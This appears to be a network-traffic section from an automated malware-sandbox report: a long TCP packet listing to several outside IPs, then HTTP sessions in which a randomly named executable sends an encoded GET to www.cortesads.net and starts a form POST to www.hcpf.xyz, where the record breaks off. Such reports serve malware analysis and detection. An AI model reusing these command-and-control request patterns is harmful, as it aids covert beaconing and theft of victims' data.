                                                                                                                            Oct 19, 2024 12:57:51.339991093 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:51.340002060 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:52.037790060 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:52.073067904 CEST8050018203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:52.075550079 CEST5001880192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:52.843013048 CEST5001880192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:53.866977930 CEST5001980192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:53.872073889 CEST8050019203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:53.872282982 CEST5001980192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:53.879705906 CEST5001980192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:53.884810925 CEST8050019203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:54.578121901 CEST8050019203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:54.615740061 CEST8050019203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:54.615906954 CEST5001980192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:54.616772890 CEST5001980192.168.2.4203.161.41.204
                                                                                                                            Oct 19, 2024 12:57:54.625040054 CEST8050019203.161.41.204192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:59.645282984 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:57:59.650127888 CEST80500203.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:57:59.650192976 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:57:59.666585922 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:57:59.671456099 CEST80500203.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:00.290718079 CEST80500203.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:00.290771961 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:01.171504021 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:01.483194113 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:02.092540026 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:02.185935020 CEST80500203.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:02.185952902 CEST80500203.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:02.185966015 CEST80500203.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:02.186021090 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:02.186163902 CEST5002080192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:02.190450907 CEST5002180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:02.195308924 CEST80500213.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:02.195379019 CEST5002180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:02.207951069 CEST5002180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:02.212816000 CEST80500213.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:02.812414885 CEST80500213.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:02.812515974 CEST5002180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:03.717607975 CEST5002180192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:03.722523928 CEST80500213.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.739464998 CEST5002280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:04.744364977 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.747522116 CEST5002280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:04.758877993 CEST5002280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:04.763930082 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.763945103 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.763969898 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.763983011 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.763997078 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.764249086 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.764261007 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.764317989 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:04.764329910 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:05.380330086 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:05.380413055 CEST5002280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:06.264447927 CEST5002280192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:06.269635916 CEST80500223.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:07.283636093 CEST5002380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:07.288542986 CEST80500233.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:07.291656017 CEST5002380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:07.298891068 CEST5002380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:07.303739071 CEST80500233.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:07.936068058 CEST80500233.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:07.936851978 CEST80500233.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:07.936908007 CEST5002380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:07.944040060 CEST5002380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:58:07.948867083 CEST80500233.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:13.966286898 CEST5002480192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:13.971446991 CEST8050024221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:13.971512079 CEST5002480192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:13.986521959 CEST5002480192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:13.992224932 CEST8050024221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:14.948312998 CEST8050024221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:14.950340986 CEST8050024221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:14.950484037 CEST5002480192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:15.132085085 CEST8050024221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:15.134773016 CEST5002480192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:15.498907089 CEST5002480192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:16.518951893 CEST5002580192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:16.523957014 CEST8050025221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:16.524068117 CEST5002580192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:16.537206888 CEST5002580192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:16.542169094 CEST8050025221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:17.484088898 CEST8050025221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:17.484107971 CEST8050025221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:17.485657930 CEST5002580192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:17.507009983 CEST8050025221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:17.507114887 CEST5002580192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:17.667673111 CEST8050025221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:17.667727947 CEST5002580192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:18.045660973 CEST5002580192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:19.065431118 CEST5002680192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:19.070409060 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.070492029 CEST5002680192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:19.082093000 CEST5002680192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:19.086929083 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.086988926 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.086997986 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.087006092 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.087138891 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.087198019 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.087207079 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.087223053 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:19.087323904 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:20.029829025 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:20.030311108 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:20.030369043 CEST5002680192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:20.213624001 CEST8050026221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:20.213689089 CEST5002680192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:20.593723059 CEST5002680192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:21.613058090 CEST5002780192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:21.617959023 CEST8050027221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:21.618031979 CEST5002780192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:21.626403093 CEST5002780192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:21.631225109 CEST8050027221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:22.594252110 CEST8050027221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:22.594269991 CEST8050027221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:22.594449043 CEST5002780192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:22.778184891 CEST8050027221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:22.781888008 CEST5002780192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:22.782716036 CEST5002780192.168.2.4221.128.225.57
                                                                                                                            Oct 19, 2024 12:58:22.787497044 CEST8050027221.128.225.57192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:27.867402077 CEST5002880192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:27.872241974 CEST8050028199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:27.872315884 CEST5002880192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:27.886468887 CEST5002880192.168.2.4199.59.243.227
                                                                                                                            Oct 19, 2024 12:58:27.891267061 CEST8050028199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:58:29.004385948 CEST8050028199.59.243.227192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:16.266953945 CEST5004380192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:16.271826029 CEST80500433.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:21.307214975 CEST5004480192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:21.312205076 CEST80500443.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:21.312340021 CEST5004480192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:21.323249102 CEST5004480192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:21.329225063 CEST80500443.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:22.826778889 CEST5004480192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:22.951355934 CEST80500443.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:22.954823017 CEST80500443.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:23.074651003 CEST80500443.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:23.074748039 CEST5004480192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:23.847356081 CEST5004580192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:23.852324009 CEST80500453.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:23.852392912 CEST5004580192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:23.867810011 CEST5004580192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:23.873613119 CEST80500453.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:25.373667002 CEST5004580192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:25.378873110 CEST80500453.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:25.381503105 CEST5004580192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:26.407331944 CEST5004680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:26.412306070 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.412389994 CEST5004680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:26.439686060 CEST5004680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:26.444586992 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444639921 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444648981 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444657087 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444669008 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444787025 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444796085 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444806099 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:26.444814920 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:27.045386076 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:27.045458078 CEST5004680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:27.951888084 CEST5004680192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:27.956768036 CEST80500463.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:28.997345924 CEST5004780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:29.002386093 CEST80500473.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:29.005743027 CEST5004780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:29.056119919 CEST5004780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:29.061269045 CEST80500473.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:29.646204948 CEST80500473.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:29.646998882 CEST80500473.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:29.649501085 CEST5004780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:29.653552055 CEST5004780192.168.2.43.33.130.190
                                                                                                                            Oct 19, 2024 12:59:29.658318043 CEST80500473.33.130.190192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:35.636054993 CEST5004880192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:35.640955925 CEST8050048129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:35.641405106 CEST5004880192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:35.653805971 CEST5004880192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:35.658624887 CEST8050048129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:36.625159025 CEST8050048129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:36.814327955 CEST8050048129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:36.817387104 CEST5004880192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:37.154849052 CEST5004880192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:38.175065041 CEST5004980192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:38.180269957 CEST8050049129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:38.180372953 CEST5004980192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:38.195497990 CEST5004980192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:38.200767040 CEST8050049129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:39.134040117 CEST8050049129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:39.187203884 CEST5004980192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:39.315416098 CEST8050049129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:39.315587997 CEST5004980192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:39.701786995 CEST5004980192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:40.721272945 CEST5005080192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:41.146348953 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.149580002 CEST5005080192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:41.161271095 CEST5005080192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:41.166157961 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166168928 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166178942 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166197062 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166204929 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166383982 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166392088 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166445971 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:41.166455030 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:42.105974913 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:42.151328087 CEST5005080192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:42.290198088 CEST8050050129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:42.290270090 CEST5005080192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:42.670588017 CEST5005080192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:43.689361095 CEST5005180192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:43.694442987 CEST8050051129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:43.694597006 CEST5005180192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:43.702356100 CEST5005180192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:43.707155943 CEST8050051129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:44.676678896 CEST8050051129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:44.717271090 CEST5005180192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:44.860420942 CEST8050051129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:44.862402916 CEST5005180192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:44.862402916 CEST5005180192.168.2.4129.226.56.200
                                                                                                                            Oct 19, 2024 12:59:44.867233038 CEST8050051129.226.56.200192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:50.279336929 CEST5005280192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:50.284537077 CEST805005284.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:50.284612894 CEST5005280192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:50.297528982 CEST5005280192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:50.302376032 CEST805005284.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:50.923250914 CEST805005284.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:50.927787066 CEST5005280192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:51.843746901 CEST5005280192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:51.848647118 CEST805005284.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:52.862771988 CEST5005380192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:52.872828960 CEST805005384.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:52.872935057 CEST5005380192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:52.883503914 CEST5005380192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:52.888540983 CEST805005384.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:53.524760008 CEST805005384.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:53.527213097 CEST5005380192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:54.389980078 CEST5005380192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:54.396962881 CEST805005384.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.409329891 CEST5005480192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:55.414714098 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.417381048 CEST5005480192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:55.429565907 CEST5005480192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:55.434672117 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.434681892 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.434685946 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.434967995 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.434977055 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.434986115 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.435122967 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.435131073 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:55.435141087 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:56.063960075 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:56.064034939 CEST5005480192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:56.937186956 CEST5005480192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:56.942414045 CEST805005484.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:57.965708017 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:57.970762968 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:57.970880985 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:57.979615927 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:57.984481096 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.617046118 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.617074013 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.617085934 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.617219925 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:58.617948055 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.617990017 CEST5005580192.168.2.484.32.84.32
                                                                                                                            Oct 19, 2024 12:59:58.618014097 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.618024111 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.618032932 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.618041992 CEST805005584.32.84.32192.168.2.4
                                                                                                                            Oct 19, 2024 12:59:58.618053913 CEST805005584.32.84.32192.168.2.4
Session ID: 0
Source IP: 192.168.2.4
Source Port: 49762
Destination IP: 3.33.130.190
Destination Port: 80
PID: 3980
Process: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe

Timestamp: Oct 19, 2024 12:57:03.347311974 CEST
Bytes transferred: 596
Direction: OUT
Data:
GET /lpx9/?2BWDG=yfrMmnVL9edufzkkV67gQCynHe5+gBIRO00DGxhyT3HPHFaar1P6nPddxxsQoEWGQjZ/tmjPotgApkkCYtaEOgx0Q//NLra/l6H2B8DThfTi+Y2WyOSOvVY=&wfm=G6oTo8vx HTTP/1.1
                                                                                                                            Host: www.cortesads.net
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
                                                                                                                             Oct 19, 2024 12:57:04.000720978 CEST | 394 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Sat, 19 Oct 2024 10:57:03 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 254
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2BWDG=yfrMmnVL9edufzkkV67gQCynHe5+gBIRO00DGxhyT3HPHFaar1P6nPddxxsQoEWGQjZ/tmjPotgApkkCYtaEOgx0Q//NLra/l6H2B8DThfTi+Y2WyOSOvVY=&wfm=G6oTo8vx"}</script></head></html>


                                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                             1 | 192.168.2.4 | 49843 | 172.67.181.186 | 80 | 3980 | C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe
                                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                                             Oct 19, 2024 12:57:19.093046904 CEST | 851 | OUT | POST /uy9i/ HTTP/1.1
                                                                                                                            Host: www.hcpf.xyz
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Content-Length: 202
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            Origin: http://www.hcpf.xyz
                                                                                                                            Referer: http://www.hcpf.xyz/uy9i/
                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:RESERVED)
